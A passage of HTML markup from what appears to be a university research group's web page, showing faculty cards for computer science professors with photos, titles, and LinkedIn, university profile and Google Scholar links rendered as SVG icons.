155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c461-outer\">\n            <div data-colibri-id=\"182-c461\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c461 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c462\" class=\"d-block style-973 style-local-182-c462 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c462-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c462-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c463\" class=\"h-global-transition-all h-heading style-974 style-local-182-c463 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c463\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c464\" class=\"h-text h-text-component style-975 style-local-182-c464 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c465\" class=\"h-text h-text-component style-976 style-local-182-c465 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c466\" class=\"style-977 style-local-182-c466 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c467-outer\">\n            <div data-colibri-id=\"182-c467\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c467 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c468\" class=\"d-block style-973 style-local-182-c468 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c468-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c468-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c469\" class=\"h-global-transition-all h-heading style-974 style-local-182-c469 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c469\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c470\" class=\"h-text h-text-component style-975 style-local-182-c470 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c471\" class=\"h-text h-text-component style-976 style-local-182-c471 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c472\" class=\"style-977 style-local-182-c472 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 